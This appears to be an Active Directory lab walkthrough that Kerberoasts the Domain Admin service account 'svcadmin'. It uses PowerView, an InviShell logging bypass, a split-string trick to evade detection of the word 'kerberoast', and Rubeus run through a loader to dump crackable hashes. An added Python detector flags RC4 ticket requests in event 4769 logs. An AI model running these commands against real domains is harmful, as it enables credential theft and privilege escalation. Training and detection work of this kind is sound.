Using the Kerberoast attack, crack the password of a SQL Server service account.
Since services running under user accounts have passwords that are easier to crack than those of machine accounts, let's find them:
# Run InviShell
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
# Run PowerView
PS C:\AD\Tools> . C:\AD\Tools\PowerView.ps1
# Get Service Accounts
PS C:\AD\Tools> Get-DomainUser -SPN
A service account called "svcadmin" is a Domain Admin and has an SPN set. We can Kerberoast it.
# ArgSplit "kerberoast"
cd C:\AD\Tools
ArgSplit.bat
set "z=t"
set "y=s"
set "x=a"
set "w=o"
set "v=r"
set "u=e"
set "t=b"
set "s=r"
set "r=e"
set "q=k"
set "Pwn=%q%%r%%s%%t%%u%%v%%w%%x%%y%%z%"
# Run Rubeus to Kerberoast
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /user:svcadmin /simple /rc4opsec /outfile:C:\AD\Tools\hashes.txt
The saved hash file must be modified before it can be cracked. Make sure you remove ":1433" from the hash file.
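
From the defender's side, the RC4 ticket request made above is recorded on the domain controller as Security event 4769 with ticket encryption type 0x17. The following is an added example, not part of the original lab, that flags such requests for user-account services; the sample records, the CORP.EXAMPLE realm and every account name except svcadmin are constructed.

```python
from collections import defaultdict

RC4_HMAC = "0x17"  # Kerberos etype 23 (RC4-HMAC) as logged in event 4769

# Constructed sample records using Security event 4769 field names (not real logs).
# "svcadmin" is the account from this page; every other value is made up.
SAMPLE_EVENTS = [
    {"EventID": 4769, "TargetUserName": "student1@CORP.EXAMPLE", "ServiceName": "svcadmin",
     "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "student1@CORP.EXAMPLE", "ServiceName": "DC01$",
     "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "alice@CORP.EXAMPLE", "ServiceName": "websvc",
     "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "WS07$@CORP.EXAMPLE", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "bob", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x17", "Status": "0x0"},
]


def is_suspicious(ev):
    """True for a successful RC4 service ticket issued for a user-account SPN."""
    if ev.get("EventID") != 4769 or ev.get("Status") != "0x0":
        return False
    service = ev.get("ServiceName", "")
    if service.endswith("$") or service.lower() == "krbtgt":
        return False  # machine accounts and krbtgt are not user-account services
    return ev.get("TicketEncryptionType", "").lower() == RC4_HMAC


def find_rc4_requests(events):
    """Map each requester to the sorted user-account services it got RC4 tickets for."""
    hits = defaultdict(set)
    for ev in events:
        if is_suspicious(ev):
            requester = ev["TargetUserName"].split("@")[0]
            hits[requester].add(ev["ServiceName"])
    return {user: sorted(services) for user, services in hits.items()}


if __name__ == "__main__":
    for user, services in find_rc4_requests(SAMPLE_EVENTS).items():
        print(f"{user} requested RC4 service tickets for: {', '.join(services)}")
```

Accounts that legitimately still use RC4 will also match, so the output is a list to review against an allowlist rather than a verdict.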